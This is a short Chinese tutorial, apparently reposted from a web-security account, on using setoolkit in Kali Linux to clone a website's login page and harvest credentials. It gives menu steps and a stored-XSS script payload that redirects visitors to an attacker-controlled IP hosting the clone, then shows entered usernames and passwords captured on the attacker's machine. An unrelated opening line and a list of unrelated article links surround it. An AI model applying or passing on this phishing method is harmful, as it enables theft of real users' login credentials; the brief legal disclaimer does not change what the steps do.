书上说,如果有一天你梦见了一个很久没有见面的人,代表他正在遗忘你 。。。
今天给大家介绍一款克隆网站工具:setoolkit
一、环境:kali 2019.04
二、用法:
1、打开终端,输入setoolkit
文章插图
文章插图
2、选择Social-Engineering Attacks
文章插图
3、选择Website Attack Vectors
文章插图
4、选择Credential Harvester Attack Method
文章插图
5、选择Site Cloner,输入要克隆的网址
文章插图
6、构造存在xss漏洞的payload,在存储型xss漏洞处输入下面脚本,提交
<script>window.location="http://192.168.152.171"</script>
7、自动跳转到我们克隆的界面
文章插图
8、随便输入账号,提交
文章插图
9、在kali机看到输入的账号和密码
文章插图
【克隆网站及利用 kali工具 -- setoolkit】
禁止非法,后果自负
欢迎大家关注公众号:web安全工具库
推荐阅读
- 云南普洱茶农业及敖汉旗旱作农业成全球重要农业文化遗产
- 桫椤养殖方法及注意事项
- 常见的宝石玉石及选购指南
- 黛比养殖方法及养护技巧
- 埃及最神秘的法老 古埃及第一位女法老
- 负离子节能灯原理及作用
- 世界湖泊之最排名 世界的湖泊
- 云南通报云南城投集团本部及下属企业违规购买酒、茶等问题
- 来凤县农业服务中心助力大河茶农及时除虫
- 搭建免费https最简单方法